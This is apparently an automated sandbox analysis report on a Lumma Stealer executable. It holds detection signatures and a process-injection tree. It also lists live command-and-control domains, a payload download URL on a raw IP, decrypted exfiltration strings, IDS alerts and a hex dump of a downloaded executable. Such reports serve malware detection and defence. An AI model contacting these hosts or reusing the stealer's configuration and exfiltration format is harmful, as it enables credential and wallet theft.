Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZjH6H6xqo7.exe

Overview

General Information

Sample name:ZjH6H6xqo7.exe
renamed because original name is a hash value
Original sample name:16a1fbd21af85d43b1ac31bf1829a152.exe
Analysis ID:1561755
MD5:16a1fbd21af85d43b1ac31bf1829a152
SHA1:522a835acc8ec09d9d74d695fb9ebaed3b2d72ff
SHA256:36589e0ed1c8a584dc014add50db2f2ac1c5a0cfac5403f7b7886b66e26a1d86
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • ZjH6H6xqo7.exe (PID: 5452 cmdline: "C:\Users\user\Desktop\ZjH6H6xqo7.exe" MD5: 16A1FBD21AF85D43B1AC31BF1829A152)
    • csc.exe (PID: 6480 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • RegAsm.exe (PID: 6392 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["300snails.sbs", "faintbl0w.sbs", "3xc1aimbl0w.sbs", "thicktoys.sbs"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: ZjH6H6xqo7.exe PID: 5452JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\ZjH6H6xqo7.exe", ParentImage: C:\Users\user\Desktop\ZjH6H6xqo7.exe, ParentProcessId: 5452, ParentProcessName: ZjH6H6xqo7.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", ProcessId: 6480, ProcessName: csc.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\ZjH6H6xqo7.exe, ProcessId: 5452, TargetFilename: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\ZjH6H6xqo7.exe", ParentImage: C:\Users\user\Desktop\ZjH6H6xqo7.exe, ParentProcessId: 5452, ParentProcessName: ZjH6H6xqo7.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline", ProcessId: 6480, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:38.621322+010020283713Unknown Traffic192.168.2.549705104.21.47.136443TCP
        2024-11-24T08:35:40.735887+010020283713Unknown Traffic192.168.2.549706104.21.47.136443TCP
        2024-11-24T08:35:42.937475+010020283713Unknown Traffic192.168.2.549707104.21.47.136443TCP
        2024-11-24T08:35:44.950948+010020283713Unknown Traffic192.168.2.549708104.21.47.136443TCP
        2024-11-24T08:35:47.056522+010020283713Unknown Traffic192.168.2.549709104.21.47.136443TCP
        2024-11-24T08:35:49.322834+010020283713Unknown Traffic192.168.2.549710104.21.47.136443TCP
        2024-11-24T08:35:51.956377+010020283713Unknown Traffic192.168.2.549711104.21.47.136443TCP
        2024-11-24T08:35:55.574111+010020283713Unknown Traffic192.168.2.549722104.21.47.136443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:39.319394+010020546531A Network Trojan was detected192.168.2.549705104.21.47.136443TCP
        2024-11-24T08:35:41.446509+010020546531A Network Trojan was detected192.168.2.549706104.21.47.136443TCP
        2024-11-24T08:35:56.299081+010020546531A Network Trojan was detected192.168.2.549722104.21.47.136443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:39.319394+010020498361A Network Trojan was detected192.168.2.549705104.21.47.136443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:41.446509+010020498121A Network Trojan was detected192.168.2.549706104.21.47.136443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:38.621322+010020576711Domain Observed Used for C2 Detected192.168.2.549705104.21.47.136443TCP
        2024-11-24T08:35:40.735887+010020576711Domain Observed Used for C2 Detected192.168.2.549706104.21.47.136443TCP
        2024-11-24T08:35:42.937475+010020576711Domain Observed Used for C2 Detected192.168.2.549707104.21.47.136443TCP
        2024-11-24T08:35:44.950948+010020576711Domain Observed Used for C2 Detected192.168.2.549708104.21.47.136443TCP
        2024-11-24T08:35:47.056522+010020576711Domain Observed Used for C2 Detected192.168.2.549709104.21.47.136443TCP
        2024-11-24T08:35:49.322834+010020576711Domain Observed Used for C2 Detected192.168.2.549710104.21.47.136443TCP
        2024-11-24T08:35:51.956377+010020576711Domain Observed Used for C2 Detected192.168.2.549711104.21.47.136443TCP
        2024-11-24T08:35:55.574111+010020576711Domain Observed Used for C2 Detected192.168.2.549722104.21.47.136443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:36.997805+010020576701Domain Observed Used for C2 Detected192.168.2.5617461.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:50.066874+010020480941Malware Command and Control Activity Detected192.168.2.549710104.21.47.136443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-24T08:35:51.960983+010028438641A Network Trojan was detected192.168.2.549711104.21.47.136443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: ZjH6H6xqo7.exeAvira: detected
        Antivirus detection for URL or domain
        Source: https://sector-essay.cyou/apiAvira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apijAvira URL Cloud: Label: malware
        Source: http://147.45.44.131/infopage/tvh53.exeAvira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/5Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apiOAvira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apiCAvira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/Avira URL Cloud: Label: malware
        Source: https://sector-essay.cyou:443/apiMicrosoftAvira URL Cloud: Label: malware
        Source: https://sector-essay.cyou/apieAvira URL Cloud: Label: malware
        Source: https://sector-essay.cyou:443/apiAvira URL Cloud: Label: malware
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
        Found malware configuration
        Source: 5.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["300snails.sbs", "faintbl0w.sbs", "3xc1aimbl0w.sbs", "thicktoys.sbs"]}
        Multi AV Scanner detection for submitted file
        Source: ZjH6H6xqo7.exeReversingLabs: Detection: 71%
        Source: ZjH6H6xqo7.exeVirustotal: Detection: 65%Perma Link
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dllJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: ZjH6H6xqo7.exeJoe Sandbox ML: detected
        Sample uses string decryption to hide its real strings
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: faintbl0w.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 300snails.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 3xc1aimbl0w.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: thicktoys.sbs
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004192C3 CryptUnprotectData,5_2_004192C3
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.47.136:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: ZjH6H6xqo7.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.pdb source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4C697C35h5_2_00441050
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edx], al5_2_0042E3BE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]5_2_00441480
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+000000E8h]5_2_0040E4AF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-0CA2BA0Eh]5_2_0040CDB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+esi+04h]5_2_00423850
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-2FEE79D7h]5_2_0040D80D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl5_2_0042C81E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+04h], eax5_2_0042E03F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h5_2_004268D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], dx5_2_00418890
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+000001ADh]5_2_0041990C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+5F30FA22h]5_2_0040B1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_004251D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4C697C35h5_2_004411E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], bl5_2_004091B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi]5_2_00440210
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, edx5_2_0041C225
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi]5_2_004402F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_0041D330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [esi+edx+00000420h]5_2_0042C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [ebx], dl5_2_0042C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-5B418B08h]5_2_0043C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh5_2_0043C3D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax5_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], ax5_2_0041EB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-42FFC5DBh]5_2_0040D392
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_00425440
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]5_2_00435CC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]5_2_0042B4E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax5_2_00426C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+04h], eax5_2_0042ED09
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]5_2_0040AD20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [esi+04h], eax5_2_0042EDCA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax5_2_004255D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [edi]5_2_0043FDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movsx eax, byte ptr [esi]5_2_0043FDE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h5_2_004235F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-10h], edx5_2_00424DA1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, bx5_2_004255A4
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 32F24C0Bh5_2_0043BE60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-7269D38Fh]5_2_00418E83
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [00446898h]5_2_00419744
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ecx], edi5_2_0040B769
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 9C142CDAh5_2_00440F70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, word ptr [eax]5_2_00441720
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, ecx5_2_004077D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al5_2_0041FF90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx5_2_0040C795
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 1B6183F2h5_2_0043BFA0

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2057670 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sector-essay .cyou) : 192.168.2.5:61746 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49711 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49710 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49709 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49706 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49708 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49722 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2057671 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (sector-essay .cyou in TLS SNI) : 192.168.2.5:49707 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49711 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.47.136:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.47.136:443
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: 300snails.sbs
        Source: Malware configuration extractorURLs: faintbl0w.sbs
        Source: Malware configuration extractorURLs: 3xc1aimbl0w.sbs
        Source: Malware configuration extractorURLs: thicktoys.sbs
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 24 Nov 2024 07:35:35 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 16 Nov 2024 15:59:10 GMTETag: "4ce00-62709c39a70e3"Accept-Ranges: bytesContent-Length: 314880Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 a2 bf 37 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 ba 00 00 00 00 00 00 70 8a 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cd 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 05 00 24 3d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 3d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 0f 04 00 00 10 00 00 00 10 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a7 20 00 00 00 20 04 00 00 22 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c fe 00 00 00 50 04 00 00 58 00 00 00 36 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 04 00 00 00 00 50 05 00 00 02 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 24 3d 00 00 00 60 05 00 00 3e 00 00 00 90 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 